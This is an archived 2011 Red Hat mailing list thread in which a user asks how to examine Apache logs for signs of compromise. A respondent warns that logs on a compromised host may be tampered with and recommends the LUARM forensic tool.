Re: forensic Apache log analysis

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]


This looks like interesting. As you say for my actual problem is not a
solution, but it is interesting to use in other systems.

My logs, I think, aren´t compromissed because they are not stored in the
same machine that is running Apache. So I thnk I can rely on them...

greetings and thanks for your help


2011/7/27 Georgios Magklaras <georgios@xxxxxxxxxxxxx>

> On 07/27/2011 08:24 AM, ESGLinux wrote:
>> Hi All,
>> I have a problem with a RHEL server and I want to ask you for some advice.
>> I´m not a security expert so I don´t know which can be the best aproach to
>> solve my problem.
>> The problem is that I have several GigaBytes of Apache logs and I need to
>> look for attacks on it to check if the server has been compromised.
>> I can manually check some possible attack urls and looking for them on the
>> logs, but I´m sure there must be tools or technics to do these in the
>> correct way.
>> So, any idea that can help me?
>> Thank you very much in advance,
>> ESG
> The tools the others suggested are fine, however, normally, the culprit
> with this approach is that you should not rely on the application logs
> (experience often shows that logs that stay on the suspected compromised
> system) might be tampered/compromised. This is contrary to the idea of
> forensics, where you should have at a minimum something off the client
> system to ensure some level of confidence in a post mortem examination.
> In the future, please do take a look at LUARM:
> .
> Make sure you get the latest version of it from svn by doing a:
> svn co https://luarm.svn.sourceforge.**net/svnroot/luarm<>luarm
> and then follow the README for setup instructions. A case where I used
> LUARM to detect a botnet compromised LAMP
> is here:
> http://epistolatory.blogspot.**com/2011/02/catching-**
> undesired-guest-in-penguin-**tmp.html<>
> Please do feel free to pass feedback.
> GM
> --
> --
> George Magklaras PhD
> RHCE no: 805008309135525
> Senior Systems Engineer/IT Manager
> Biotek Center, University of Oslo
> EMBnet TMPC Chair
> Tel: +47 22840535
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@**<redhat-list-request@xxxxxxxxxx>
> ?subject=unsubscribe
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe

[CentOS]     [Kernel Development]     [Red Hat Install]     [PAM]     [Fedora Users]     [Red Hat Development]     [Red Hat 9]     [Big List of Linux Books]     [Linux Admin]     [Photo Sharing]     [Hot Springs]     [Gimp]     [Asterisk PBX]     [Yosemite News]     [Red Hat Crash Utility]

Add to Google Powered by Linux